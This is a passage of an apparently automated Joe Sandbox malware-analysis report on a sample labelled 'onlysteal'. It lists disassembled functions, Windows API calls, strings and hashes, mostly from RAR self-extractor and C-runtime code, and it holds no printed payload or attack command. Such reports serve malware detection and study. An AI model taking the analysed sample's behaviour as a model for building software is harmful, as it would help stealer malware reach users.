                                        • Part of subcall function 00241FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0023C116,00000000,.exe,?,?,00000800,?,?,?,00248E3C), ref: 00241FD1
                                      • _swprintf.LIBCMT ref: 00239465
                                        • Part of subcall function 00234092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 002340A5
                                      • MoveFileW.KERNEL32(?,?), ref: 002394D4
                                      • MoveFileW.KERNEL32(?,?), ref: 00239514
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
                                      • String ID: rtmp%d
                                      • API String ID: 3726343395-3303766350
                                      • Opcode ID: 7d28df8245850e777871e6dce9aff4221b381d3f0aa59c66ffad77b4293b154a
                                      • Instruction ID: 9ea0604922ef2869399fa5a302df8ffab29efae12b2e1a229e8fa6adf594b3c1
                                      • Opcode Fuzzy Hash: 7d28df8245850e777871e6dce9aff4221b381d3f0aa59c66ffad77b4293b154a
                                      • Instruction Fuzzy Hash: 544142F192125566DF21EF60CC45EDE737CAF56340F4048A5B649F3051DAB88BE98F60
                                      Function 00231100 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 119COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: _wcslen
                                      • String ID: U$$p$$z$
                                      • API String ID: 176396367-1715067004
                                      • Opcode ID: 2c7a6d3e16d6deef2b0d796ffe953bfbb954cb823538dac37398b0bf466f831c
                                      • Instruction ID: efe9975b3290ab8ea358458d66abf94778570f0efc7853d586b57098585af0fe
                                      • Opcode Fuzzy Hash: 2c7a6d3e16d6deef2b0d796ffe953bfbb954cb823538dac37398b0bf466f831c
                                      • Instruction Fuzzy Hash: 6D41B471A1066A5BCB15DF688C4A9EF7BBCEF01311F01001AFD46E7245DE30AE698EA4
                                      Function 00249ED5 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 114COMMON
                                      Download Yara Rule
                                      APIs
                                      • ShowWindow.USER32(?,00000000), ref: 00249EEE
                                      • GetWindowRect.USER32(?,00000000), ref: 00249F44
                                      • ShowWindow.USER32(?,00000005,00000000), ref: 00249FDB
                                      • SetWindowTextW.USER32(?,00000000), ref: 00249FE3
                                      • ShowWindow.USER32(00000000,00000005), ref: 00249FF9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: Window$Show$RectText
                                      • String ID: $$RarHtmlClassName
                                      • API String ID: 3937224194-3526849998
                                      • Opcode ID: 8b4b94e0d39d4c62274f5f91233011df6efc1b3a89646eccc75fb21945fe0c4e
                                      • Instruction ID: dac6c246937a72708683cdfa4d4d8f2353db60199d621bb0452f50a2515752fd
                                      • Opcode Fuzzy Hash: 8b4b94e0d39d4c62274f5f91233011df6efc1b3a89646eccc75fb21945fe0c4e
                                      • Instruction Fuzzy Hash: 5941B132018310EFCB259FA4EC4DB6B7BA8FF48711F00455AF8499A166CB34D968CF65
                                      Function 00241218 Relevance: 12.1, APIs: 8, Instructions: 125timeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • __aulldiv.LIBCMT ref: 0024122E
                                        • Part of subcall function 0023B146: GetVersionExW.KERNEL32(?), ref: 0023B16B
                                      • FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,?), ref: 00241251
                                      • FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,?), ref: 00241263
                                      • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00241274
                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 00241284
                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 00241294
                                      • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 002412CF
                                      • __aullrem.LIBCMT ref: 00241379
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                      • String ID:
                                      • API String ID: 1247370737-0
                                      • Opcode ID: 67302037dfb518f0763d51dec728adc7c159d6bf025e3c69cef1c874abf668e0
                                      • Instruction ID: 2e10aa41a2892f2c6494cf0391439e0b7854105f4dcc974d96d7af0d36ac74e6
                                      • Opcode Fuzzy Hash: 67302037dfb518f0763d51dec728adc7c159d6bf025e3c69cef1c874abf668e0
                                      • Instruction Fuzzy Hash: 514139B15083459FC714DF65C88496BBBF9FF88314F00892EF99AC2210E774E569CB61
                                      Function 00232210 Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 468COMMON
                                      Download Yara Rule
                                      APIs
                                      • _swprintf.LIBCMT ref: 00232536
                                        • Part of subcall function 00234092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 002340A5
                                        • Part of subcall function 002405DA: _wcslen.LIBCMT ref: 002405E0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: __vswprintf_c_l_swprintf_wcslen
                                      • String ID: ;%u$x%u$xc%u
                                      • API String ID: 3053425827-2277559157
                                      • Opcode ID: b19f0a66dddb8fd62c1423f53b8c1da1c2175d6c6d1820150ee53c931f5884ac
                                      • Instruction ID: 6e77d0fb5849f0ea25d91a6b2721a52b2ea0e744abe97d1c4e5cb961e43b0e10
                                      • Opcode Fuzzy Hash: b19f0a66dddb8fd62c1423f53b8c1da1c2175d6c6d1820150ee53c931f5884ac
                                      • Instruction Fuzzy Hash: AEF129F0628341DBCB15EF248495BFE77995F90300F18096DED86AB283CB64996DCB62
                                      Function 00249CFE Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 183COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: _wcslen
                                      • String ID: </p>$</style>$<br>$<style>$>
                                      • API String ID: 176396367-3568243669
                                      • Opcode ID: f6a8a5967a80e32794a20b1f6f7c0b56c6c0108e2e5b70ea6809128795079d34
                                      • Instruction ID: 581881d36643eaae2154bd05d0e3be7733d94910576184c77db8f7c187d42150
                                      • Opcode Fuzzy Hash: f6a8a5967a80e32794a20b1f6f7c0b56c6c0108e2e5b70ea6809128795079d34
                                      • Instruction Fuzzy Hash: 0B51D566B60323D5DB38AE699811B7773E4DFA1790F69041BE9C18B1C0FAA58CF18261
                                      Function 0025F68D Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,0025FE02,00000000,00000000,00000000,00000000,00000000,?), ref: 0025F6CF
                                      • __fassign.LIBCMT ref: 0025F74A
                                      • __fassign.LIBCMT ref: 0025F765
                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 0025F78B
                                      • WriteFile.KERNEL32(?,00000000,00000000,0025FE02,00000000,?,?,?,?,?,?,?,?,?,0025FE02,00000000), ref: 0025F7AA
                                      • WriteFile.KERNEL32(?,00000000,00000001,0025FE02,00000000,?,?,?,?,?,?,?,?,?,0025FE02,00000000), ref: 0025F7E3
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                      • String ID:
                                      • API String ID: 1324828854-0
                                      • Opcode ID: 35e4d47d4c45dff690397bc0a7ba1924754433425c08bec822e4f4063f930134
                                      • Instruction ID: 1a457c505b9a8373a8fa09c0da4ece6f6f4d95df4fe601d920c7a55931835955
                                      • Opcode Fuzzy Hash: 35e4d47d4c45dff690397bc0a7ba1924754433425c08bec822e4f4063f930134
                                      • Instruction Fuzzy Hash: D051E5B1D10209AFCB10CFA8DD49AEEFBF8EF09301F14416AE951E7251D770AA54CBA4
                                      Function 0024CE87 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 133COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetTempPathW.KERNEL32(00000800,?), ref: 0024CE9D
                                        • Part of subcall function 0023B690: _wcslen.LIBCMT ref: 0023B696
                                      • _swprintf.LIBCMT ref: 0024CED1
                                        • Part of subcall function 00234092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 002340A5
                                      • SetDlgItemTextW.USER32(?,00000066,0027946A), ref: 0024CEF1
                                      • _wcschr.LIBVCRUNTIME ref: 0024CF22
                                      • EndDialog.USER32(?,00000001), ref: 0024CFFE
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr_wcslen
                                      • String ID: %s%s%u
                                      • API String ID: 689974011-1360425832
                                      • Opcode ID: e97bec4d8a5853f4af06b16e374a0aa13514ffa5834eae9b74862cc64162de2e
                                      • Instruction ID: faa12cc043b7284716379ecf2bef50db9b11fea3c964758ff0cc75cda9548e7d
                                      • Opcode Fuzzy Hash: e97bec4d8a5853f4af06b16e374a0aa13514ffa5834eae9b74862cc64162de2e
                                      • Instruction Fuzzy Hash: 4D41C4B1920219AADF29DF54DC45EEE77BCEB05300F4080A6FA09E7051EF748AA4CF61
                                      Function 00252900 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                      Download Yara Rule
                                      APIs
                                      • _ValidateLocalCookies.LIBCMT ref: 00252937
                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 0025293F
                                      • _ValidateLocalCookies.LIBCMT ref: 002529C8
                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 002529F3
                                      • _ValidateLocalCookies.LIBCMT ref: 00252A48
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                      • String ID: csm
                                      • API String ID: 1170836740-1018135373
                                      • Opcode ID: 6b4690041784e502d99000912112d2d4665544e7bc22ab91e30729a4f3387cfe
                                      • Instruction ID: a5fea0e0af3feac69e1892c11c1383280fd5e866f23eb7f6e2e3a4f9f87afb3b
                                      • Opcode Fuzzy Hash: 6b4690041784e502d99000912112d2d4665544e7bc22ab91e30729a4f3387cfe
                                      • Instruction Fuzzy Hash: 8941D534A20219DFCF10DF68C884A9EBBB0EF46315F148055EC156B392C7719A6DCF94
                                      Function 00249955 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 106COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: _wcslen
                                      • String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
                                      • API String ID: 176396367-3743748572
                                      • Opcode ID: 9ed6b4de9188063aef9bdd7e040aca5c5a59cf8f3f7f03d0033ec616d71e1a89
                                      • Instruction ID: 3aeabe4443bd9c155d2bedc6760e03c5e0cd01afaa1f9931187c430f375bcd34
                                      • Opcode Fuzzy Hash: 9ed6b4de9188063aef9bdd7e040aca5c5a59cf8f3f7f03d0033ec616d71e1a89
                                      • Instruction Fuzzy Hash: CE315E326743565AD638EF549C42B7773E4EB50720F50441EF882472C0FBA0ADF887A5
                                      Function 0024AAC9 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 77COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetDC.USER32(00000000), ref: 0024AAD2
                                      • GetObjectW.GDI32(?,00000018,?), ref: 0024AB01
                                      • ReleaseDC.USER32(00000000,?), ref: 0024AB99
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: ObjectRelease
                                      • String ID: -$$7$$$
                                      • API String ID: 1429681911-3445527946
                                      • Opcode ID: 92eb25f6f9603826ceee2ec42f0dd3002e3b9b2ebf2d158235daa17804cdb3ab
                                      • Instruction ID: 7597f854bff26c934282ac10cb961904bc7ec2e5fc3ee8965f2d9e5499966c24
                                      • Opcode Fuzzy Hash: 92eb25f6f9603826ceee2ec42f0dd3002e3b9b2ebf2d158235daa17804cdb3ab
                                      • Instruction Fuzzy Hash: AE21F872108314AFD3019FA5EC4CE6FBFE9FB89355F04092AFA4692220D7319A548B62
                                      Function 0025C8A4 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0025C868: _free.LIBCMT ref: 0025C891
                                      • _free.LIBCMT ref: 0025C8F2
                                        • Part of subcall function 00258DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0025C896,00263A34,00000000,00263A34,00000000,?,0025C8BD,00263A34,00000007,00263A34,?,0025CCBA,00263A34), ref: 00258DE2
                                        • Part of subcall function 00258DCC: GetLastError.KERNEL32(00263A34,?,0025C896,00263A34,00000000,00263A34,00000000,?,0025C8BD,00263A34,00000007,00263A34,?,0025CCBA,00263A34,00263A34), ref: 00258DF4
                                      • _free.LIBCMT ref: 0025C8FD
                                      • _free.LIBCMT ref: 0025C908
                                      • _free.LIBCMT ref: 0025C95C
                                      • _free.LIBCMT ref: 0025C967
                                      • _free.LIBCMT ref: 0025C972
                                      • _free.LIBCMT ref: 0025C97D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 776569668-0
                                      • Opcode ID: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                      • Instruction ID: 95f8c1b774c07a2e022bec975c37b20263253d234c49ea749d8e8b89d59ea10e
                                      • Opcode Fuzzy Hash: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                      • Instruction Fuzzy Hash: 341172715A1708AAE521B771CC0BFCB7BEC9F10B02F400C14BB9D66092EA74B56D8F54
                                      Function 0024E5EE Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45libraryloaderCOMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,0024E669,0024E5CC,0024E86D), ref: 0024E605
                                      • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 0024E61B
                                      • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 0024E630
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: AddressProc$HandleModule
                                      • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                      • API String ID: 667068680-1718035505
                                      • Opcode ID: bc5f95f7e7e456522d9106642a3d885bbaa1e9d895bdd159b1e3541e8c616abd
                                      • Instruction ID: dc96f53ca3a311ba2159a5907e3f3c0d9d2377676d8bb673deaa305dd65d1220
                                      • Opcode Fuzzy Hash: bc5f95f7e7e456522d9106642a3d885bbaa1e9d895bdd159b1e3541e8c616abd
                                      • Instruction Fuzzy Hash: 87F0C271BB06639B2F268E757C8C56662CC7A25741B03453ADA02D3140EBA0CC745B91
                                      Function 00258900 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 30COMMON
                                      Download Yara Rule
                                      APIs
                                      • _free.LIBCMT ref: 0025891E
                                        • Part of subcall function 00258DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0025C896,00263A34,00000000,00263A34,00000000,?,0025C8BD,00263A34,00000007,00263A34,?,0025CCBA,00263A34), ref: 00258DE2
                                        • Part of subcall function 00258DCC: GetLastError.KERNEL32(00263A34,?,0025C896,00263A34,00000000,00263A34,00000000,?,0025C8BD,00263A34,00000007,00263A34,?,0025CCBA,00263A34,00263A34), ref: 00258DF4
                                      • _free.LIBCMT ref: 00258930
                                      • _free.LIBCMT ref: 00258943
                                      • _free.LIBCMT ref: 00258954
                                      • _free.LIBCMT ref: 00258965
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID: p&
                                      • API String ID: 776569668-4236815001
                                      • Opcode ID: fca05a4224b3536e9ef0a373553c222c40ddc17b9cf0bbc89642a64a3c8a3445
                                      • Instruction ID: 78392f73160451238767fda586125a6ac17645cd94e78043f309647598a1e1dd
                                      • Opcode Fuzzy Hash: fca05a4224b3536e9ef0a373553c222c40ddc17b9cf0bbc89642a64a3c8a3445
                                      • Instruction Fuzzy Hash: 2CF0DA75C22126EBCB466F24FC0A4153BF5FB247253010507FA15662B1DBB2496DDF8A
                                      Function 0024146A Relevance: 9.1, APIs: 6, Instructions: 98timeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 002414C2
                                        • Part of subcall function 0023B146: GetVersionExW.KERNEL32(?), ref: 0023B16B
                                      • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 002414E6
                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00241500
                                      • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00241513
                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 00241523
                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 00241533
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
